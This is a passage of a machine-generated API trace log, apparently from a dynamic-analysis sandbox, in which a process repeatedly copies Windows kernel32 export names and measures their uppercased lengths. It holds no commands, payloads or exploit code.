lpString1=0x36fd0ac, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0184.611] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0184.611] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0184.611] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0184.611] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0184.611] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0184.611] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0184.611] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0184.612] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0184.612] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0184.612] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0184.612] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0184.612] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0184.612] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0184.612] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0184.612] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0184.612] lstrlenA (lpString="BEEP") returned 4 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0184.612] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0184.612] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0184.612] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0184.612] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0184.612] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0184.612] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0184.612] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0184.612] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0184.612] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0184.612] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0184.613] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0184.613] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0184.613] lstrlenA (lpString="CANCELIO") returned 8 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0184.613] lstrlenA (lpString="CANCELIOEX") returned 10 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0184.613] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0184.613] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0184.613] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0184.613] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0184.613] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0184.613] lstrlenA (lpString="CHECKELEVATION") returned 14 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0184.613] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0184.613] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0184.613] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0184.613] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0184.613] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0184.613] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0184.613] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0184.613] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0184.613] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0184.613] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0184.614] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0184.614] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0184.614] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0184.614] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0184.614] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0184.614] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0184.614] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0184.614] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0184.614] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0184.614] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0184.614] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0184.614] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0184.614] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0184.614] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0184.614] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0184.614] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0184.614] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0184.614] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0184.614] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0184.614] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0184.615] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0184.615] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0184.615] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0184.615] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0184.615] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0184.615] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0184.615] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0184.615] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0184.615] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0184.615] lstrlenA (lpString="COPYCONTEXT") returned 11 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0184.615] lstrlenA (lpString="COPYFILEA") returned 9 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0184.615] lstrlenA (lpString="COPYFILEEXA") returned 11 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0184.615] lstrlenA (lpString="COPYFILEEXW") returned 11 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0184.615] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0184.615] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0184.615] lstrlenA (lpString="COPYFILEW") returned 9 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0184.615] lstrlenA (lpString="COPYLZFILE") returned 10 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0184.615] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0184.615] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0184.615] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0184.616] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0184.616] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0184.616] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0184.616] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0184.616] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0184.616] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0184.616] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0184.616] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0184.616] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0184.616] lstrlenA (lpString="CREATEEVENTA") returned 12 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0184.616] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0184.616] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0184.616] lstrlenA (lpString="CREATEEVENTW") returned 12 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0184.616] lstrlenA (lpString="CREATEFIBER") returned 11 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0184.616] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0184.616] lstrlenA (lpString="CREATEFILEA") returned 11 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0184.616] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0184.616] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0184.616] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0184.616] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0184.617] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0184.617] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0184.617] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0184.617] lstrlenA (lpString="CREATEFILEW") returned 11 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0184.617] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0184.617] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0184.617] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0184.617] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0184.617] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0184.617] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0184.617] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0184.617] lstrlenA (lpString="CREATEJOBSET") returned 12 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0184.617] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0184.617] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0184.617] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0184.617] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0184.617] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0184.617] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0184.617] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0184.617] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0184.618] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0184.618] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0184.618] lstrlenA (lpString="CREATEPIPE") returned 10 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0184.618] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0184.618] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0184.618] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0184.618] lstrlenA 